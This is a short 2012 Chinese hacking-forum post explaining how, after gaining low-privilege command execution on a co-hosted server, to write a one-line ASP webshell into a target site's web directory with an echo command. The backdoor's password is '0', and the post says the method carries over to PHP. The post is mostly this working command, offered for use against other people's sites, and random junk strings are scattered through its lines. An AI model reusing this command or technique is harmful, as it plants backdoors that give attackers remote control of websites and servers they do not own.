找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2320|回复: 0
打印 上一主题 下一主题

旁注cmd低权限下拿webshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-23 14:40:24 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。7 N. J% ?' M2 `8 [* d
+ h1 C. d3 r, j: G  K. J" T
命令格式
. \: _- T7 {$ S5 ?9 Z, n4 Q7 R% W9 P  F
Echo 语句 >目标站绝对目录1 E& M% n) `7 c: r! e

/ h+ {8 [( H: n+ n% I例如:
1 k# W/ I3 O! w5 H+ t+ k. X6 K: F, h; q9 ]  B! ]8 ^1 ^- X
echo ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp
. ]- k( C' v; S3 Z( v
# j4 q: h- w' D8 z+ |& \/ O这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。1 p, M8 c+ h0 v: j& F& `! {5 U; x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表